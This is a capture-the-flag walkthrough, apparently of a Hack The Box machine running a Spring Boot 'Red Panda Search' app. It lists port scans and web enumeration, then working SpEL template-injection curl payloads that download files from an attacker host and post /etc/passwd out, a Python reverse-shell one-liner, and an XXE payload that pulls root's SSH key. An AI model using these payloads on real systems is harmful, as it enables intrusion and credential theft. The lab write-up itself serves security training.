Scanning

TARGET=10.10.11.170 && nmap -p$(nmap -p- --min-rate=1000 -T4 $TARGET -Pn | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//) -sC -sV -Pn -vvv $TARGET -oN nmap_tcp_all.nmap

PORT     STATE SERVICE    REASON         VERSION
22/tcp   open  ssh        syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
8080/tcp open  http-proxy syn-ack ttl 63
| fingerprint-strings: 
|   GetRequest: 
|     HTTP/1.1 200 
|     Content-Type: text/html;charset=UTF-8
|     Content-Language: en-US
|     Date: Sun, 17 Jul 2022 21:29:22 GMT
|     Connection: close
|     <!DOCTYPE html>
|     <html lang="en" dir="ltr">
|     <head>
|     <meta charset="utf-8">
|     <meta author="wooden_k">
|     <!--Codepen by khr2003: https://codepen.io/khr2003/pen/BGZdXw -->
|     <link rel="stylesheet" href="css/panda.css" type="text/css">
|     <link rel="stylesheet" href="css/main.css" type="text/css">
|     <title>Red Panda Search | Made with Spring Boot</title>
|     </head>
|     <body>
|     <div class='pande'>
|     <div class='ear left'></div>
|     <div class='ear right'></div>
|     <div class='whiskers left'>
|     <span></span>
|     <span></span>
|     <span></span>
|     </div>
|     <div class='whiskers right'>
|     <span></span>
|     <span></span>
|     <span></span>
|     </div>
|     <div class='face'>
|     <div class='eye
|   HTTPOptions: 
|     HTTP/1.1 200 
|     Allow: GET,HEAD,OPTIONS
|     Content-Length: 0
|     Date: Sun, 17 Jul 2022 21:29:22 GMT
|     Connection: close
|   RTSPRequest: 
|     HTTP/1.1 400 
|     Content-Type: text/html;charset=utf-8
|     Content-Language: en
|     Content-Length: 435
|     Date: Sun, 17 Jul 2022 21:29:22 GMT
|     Connection: close
|     <!doctype html><html lang="en"><head><title>HTTP Status 400 
|     Request</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 400 
|_    Request</h1></body></html>
|_http-title: Red Panda Search | Made with Spring Boot
| http-methods: 
|_  Supported Methods: GET HEAD OPTIONS
|_http-open-proxy: Proxy might be redirecting requests

web enum

> dirsearch -u http://10.10.11.170:8080/ -x 401,403           
[17:32:16] 200 -    2KB - /;json/
[17:32:16] 200 -    2KB - /;login/
[17:32:16] 200 -    2KB - /;admin/
[17:32:16] 400 -  435B  - /\..\..\..\..\..\..\..\..\..\etc\passwd
[17:32:17] 400 -  435B  - /a%5c.aspx
[17:32:46] 500 -   86B  - /error
[17:32:46] 500 -   86B  - /error/
[17:33:16] 405 -  117B  - /search
[17:33:21] 200 -  987B  - /stats/
[17:33:21] 200 -  987B  - /stats

> nikto -host http://10.10.11.70:8080/
+ Server: No banner retrieved
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Uncommon header 'content-disposition' found, with contents: inline;filename=f.txt
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Allowed HTTP Methods: GET, HEAD, POST, PUT, DELETE, OPTIONS 
+ OSVDB-397: HTTP method ('Allow' Header): 'PUT' method could allow clients to save files on the web server.
+ OSVDB-5646: HTTP method ('Allow' Header): 'DELETE' may allow clients to remove files on the web server.
+ OSVDB-3092: /stats/: This might be interesting...

• http://10.10.11.170:8080/search vulnerable to ssti
• https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection

#{7*7}
*{7*7}

> curl http://10.10.11.170:8080/search -d 'name=*{T(java.lang.Runtime).getRuntime().exec("wget http://<ip>/nc -O /tmp/nc")}'
> curl http://10.10.11.170:8080/search -d 'name=*{T(java.lang.Runtime).getRuntime().exec("curl http://<ip>/ -d @/etc/passwd")}'

• From reading the /etc/passwd file, we learnt there is a user called woodenk

foothold

• Create a python script e.py with the following

'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<ip>",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

• Upload the script and run it to get shell access

> curl http://10.10.11.170:8080/search -d 'name=*{T(java.lang.Runtime).getRuntime().exec("wget http://<ip>/e.py -O /tmp/e.py")}'
> curl http://10.10.11.170:8080/search -d 'name=*{T(java.lang.Runtime).getRuntime().exec("python3 /tmp/e.py")}'

pe

• linpeas enum

[+] Readable files belonging to root and readable by me but not world readable
-rw-r----- 1 root logs 422 Jul 18 01:48 /credits/damian_creds.xml
-rw-r----- 1 root logs 426 Jul 18 01:58 /credits/woodenk_creds.xml
-rw-r----- 1 root woodenk 33 Jul 17 22:03 /home/woodenk/user.txt

• examine the file

> cat /opt/cleanup.sh
cat /opt/cleanup.sh
#!/bin/bash
/usr/bin/find /tmp -name "*.xml" -exec rm -rf {} \;
/usr/bin/find /var/tmp -name "*.xml" -exec rm -rf {} \;
/usr/bin/find /dev/shm -name "*.xml" -exec rm -rf {} \;
/usr/bin/find /home/woodenk -name "*.xml" -exec rm -rf {} \;
/usr/bin/find /tmp -name "*.jpg" -exec rm -rf {} \;
/usr/bin/find /var/tmp -name "*.jpg" -exec rm -rf {} \;
/usr/bin/find /dev/shm -name "*.jpg" -exec rm -rf {} \;
/usr/bin/find /home/woodenk -name "*.jpg" -exec rm -rf {} \;

• Read and understand how jpg and xml files are processed
• It reads the artist and take that as a username entry
• then it reads the log for a uri and compares it with the uri in the corresponding xml file
• if everything matches, it then updates the xml file.
• Here, there is a trick that you can read about: https://book.hacktricks.xyz/pentesting-web/xxe-xee-xml-external-entity

> http://10.10.11.170:8877/opt/credit-score/LogParser/final/src/main/java/com/logparser/App.java
> http://10.10.11.170:8877/opt/panda_search/redpanda.log

• So, potentially, we can trick the parser to process a xml file and include the root user’s id_rsa into it.
• Prepare two files, any jpg and a xml file

> exiftool -Artist='../home/woodenk/meow' meow.jpg
> touch meow_creds.xml

<!DOCTYPE replace [<!ENTITY example SYSTEM "file:///root/.ssh/id_rsa"> ]>
<credits>
  <author>damian</author>
  <image>
    <data>&example;</data>
    <uri>/../../../../../../home/woodenk/meow.jpg</uri>
    <views>0</views>
  </image>
  <totalviews>2</totalviews>
</credits>

• Upload the two files to the target

> wget http://<ip>/meow.jpg -O meow.jpg
> wget http://<ip>/meow.xml -O meow_creds.xml

• Trigger the log parser by including a user agent in our request

> curl http://10.10.11.170:8080/stats -A "||/../../../../../../home/woodenk/meow.jpg"
> cat /opt/panda_search/redpanda.log

• After a while, examine the meow_creds.xml and find the root’s id_rsa